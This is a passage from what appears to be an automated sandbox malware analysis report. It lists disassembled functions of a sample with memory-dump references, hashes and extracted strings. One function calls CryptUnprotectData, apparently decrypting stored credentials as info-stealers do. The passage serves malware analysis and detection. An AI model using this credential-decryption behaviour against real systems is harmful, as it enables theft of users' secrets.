                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: ea9ffd2ab3333b08a0c6d6690088663934920387c5084dff035857d36e6c7f27
                      • Instruction ID: 28db4969b84f64acaa46f823aa07fb493cd1274ed3f34a1ba8bf10af410af8da
                      • Opcode Fuzzy Hash: ea9ffd2ab3333b08a0c6d6690088663934920387c5084dff035857d36e6c7f27
                      • Instruction Fuzzy Hash: BF41E670A40A2CAFDB24DB58CC94BABB7B5BB48702F4051D8E619A72D0E7716E85CF50
                      Function 00EE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE9BA3
                      • LocalFree.KERNEL32(?), ref: 00EE9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: d4f3c07d03c0cdc5da0a84aa4c7d0394fe88cd48fa0cc5aaf628ff1b50697635
                      • Instruction ID: 477321a62643ba1685b1960c422966a708c6923b80fcfddcfb7e9c629dbbc2f7
                      • Opcode Fuzzy Hash: d4f3c07d03c0cdc5da0a84aa4c7d0394fe88cd48fa0cc5aaf628ff1b50697635
                      • Instruction Fuzzy Hash: 3E11C9B8A00209EFCB14DF94D985AAE77F9FF88304F1045A8E915AB354D770AE50CFA1
                      Function 012AC9D0 Relevance: 4.3, Strings: 3, Instructions: 566COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @a~u$mHP$s[q~
                      • API String ID: 0-4263036448
                      • Opcode ID: bd6a4ff422bd8dc143891756c19d29dcbd92f717e5189dc6033852eae3fac314
                      • Instruction ID: 2a9b986e3321d0c95168cc55e7cec8a02e8472d851ec9638b6c2789adef2d8db
                      • Opcode Fuzzy Hash: bd6a4ff422bd8dc143891756c19d29dcbd92f717e5189dc6033852eae3fac314
                      • Instruction Fuzzy Hash: 4B025CF3A0C6009FE304AE2DEC8567AB7E9EF94720F1A853DEAC4D3744E9355C158692
                      Function 012B0C1D Relevance: 4.2, Strings: 2, Instructions: 1678COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: VnoM$d/?
                      • API String ID: 0-723397907
                      • Opcode ID: 183d0d10e685f35e9e8a3e60b864ee1c2f142a40e5cbd9003848e09d8d69df2a
                      • Instruction ID: 7f7827639293d3c81e290e8aeadc7da6bd9a76a411e709927b3c7a030665a82d
                      • Opcode Fuzzy Hash: 183d0d10e685f35e9e8a3e60b864ee1c2f142a40e5cbd9003848e09d8d69df2a
                      • Instruction Fuzzy Hash: 60B24BF360C2009FE3046E2DEC8567ABBE9EF94320F1A4A3DE6C5C7744EA7558058792
                      Function 013C282D Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: :Ro;
                      • API String ID: 0-2189730635
                      • Opcode ID: 669bf1264f640494d7d630af491d5768670b2df511d28f6970ee6cde2e2c5c10
                      • Instruction ID: 13f5b8312f94c54429c44afa78dfda0718df9d11ac990dd316b8ee973e26add7
                      • Opcode Fuzzy Hash: 669bf1264f640494d7d630af491d5768670b2df511d28f6970ee6cde2e2c5c10
                      • Instruction Fuzzy Hash: 8DA122F2A083009FE7149E2CEC8576BBBE5EB54724F15853DEAC4C3B40EA36AC158756
                      Function 01297ACF Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7.;+
                      • API String ID: 0-3999621782
                      • Opcode ID: eae6148c25cd6f3d5f182be52a772cf7f3e5d7be47039f1a517382b7eb5a22a9
                      • Instruction ID: c401f4f7a4e0bf65a9c4ac08f044fa52eeaab4814d7ec945e9fa4939c61b78ad
                      • Opcode Fuzzy Hash: eae6148c25cd6f3d5f182be52a772cf7f3e5d7be47039f1a517382b7eb5a22a9
                      • Instruction Fuzzy Hash: 9B51B5F3A086108BE7186E29DC9533AFBE5EF94310F2B453DDAC593790EA3558448B87
                      Function 011FCF86 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7}?
                      • API String ID: 0-646764773
                      • Opcode ID: 87b522f0264c22e710ed4f2fb32c3c6e9ab298acbac90c3fa40c8737a6147e59
                      • Instruction ID: a8f98de47d037f0f678b06e9e86bc6a59e90ed4989f4ef76cbd62843b037f723
                      • Opcode Fuzzy Hash: 87b522f0264c22e710ed4f2fb32c3c6e9ab298acbac90c3fa40c8737a6147e59
                      • Instruction Fuzzy Hash: 64517EF391C6145FE31C2E28DCA673BBBC4EB54730F5A063DEAC697780E93518048286
                      Function 01223FE7 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: F]>^
                      • API String ID: 0-910754448
                      • Opcode ID: 18ee5ebbf7bb02b751a51d8cb1c59ecf413175af60c6178e286fe8f65afa8418
                      • Instruction ID: a48cc34e9ea40615236fbe9aa5cf5b94adf1331d361944c1e4fe09de869e5b01
                      • Opcode Fuzzy Hash: 18ee5ebbf7bb02b751a51d8cb1c59ecf413175af60c6178e286fe8f65afa8418
                      • Instruction Fuzzy Hash: 63514AB3A096008FE3186E7DDC95336B7D9EB84360F2E463DEAC5D3784F97948458286
                      Function 011DF0C6 Relevance: .2, Instructions: 227COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7fb2f6e4e4a585a303e991684b85cb5e8e9c5b8622cd4d13f9d701142270e85f
                      • Instruction ID: 7895b84382350f8591d72f33b15bfbe4ebb14da760800765d5a6cbb2d4459670
                      • Opcode Fuzzy Hash: 7fb2f6e4e4a585a303e991684b85cb5e8e9c5b8622cd4d13f9d701142270e85f
                      • Instruction Fuzzy Hash: F561E7F3A0C6005FF3086E19EC9577ABBD6EBD4320F16853DEAC9C7384E97858018696
                      Function 0126475C Relevance: .2, Instructions: 205COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca9804a31a6f5043792a62023160e3cb5ee762ca93555227b0ee1a4762f59543
                      • Instruction ID: 4286bc5fbec7dcb74ca0d853060e35ae65d47e38e7faa7c90cf3aee4a10bca85
                      • Opcode Fuzzy Hash: ca9804a31a6f5043792a62023160e3cb5ee762ca93555227b0ee1a4762f59543
                      • Instruction Fuzzy Hash: 695103F3E082146BE3086A2DDC58776BBD6EBD4320F1B853DEA8897784ED394C0482D5
                      Function 011C6506 Relevance: .2, Instructions: 185COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d8bdd30ab94b5a982908a6fd1b9484ba540772bd26fab1b443ea0687a3c6ce4
                      • Instruction ID: 909036501e14f540d86ec1c54a091c051d134534d1e03b97c815b33eb47763b5
                      • Opcode Fuzzy Hash: 6d8bdd30ab94b5a982908a6fd1b9484ba540772bd26fab1b443ea0687a3c6ce4
                      • Instruction Fuzzy Hash: 2C514DF3F081100BF3049A3DEC45766B6D6DBD4760F2A863DDA99D77C8E83D99058286
                      Function 011B2504 Relevance: .2, Instructions: 161COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a330f9dce1866acb37ed565e5cbcd8dcd1334e5ebd8da93ee93cb7679eaf396
                      • Instruction ID: be4554db5b85627a6cbbb8b0b3e7d1040a4bd7565d614b4f9316976390dcb2ab
                      • Opcode Fuzzy Hash: 8a330f9dce1866acb37ed565e5cbcd8dcd1334e5ebd8da93ee93cb7679eaf396
                      • Instruction Fuzzy Hash: 394138B3A082204FE3046E7DED997BBBBDAEF94220F1A453DDAC5C3744E93459048696
                      Function 00EF9750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
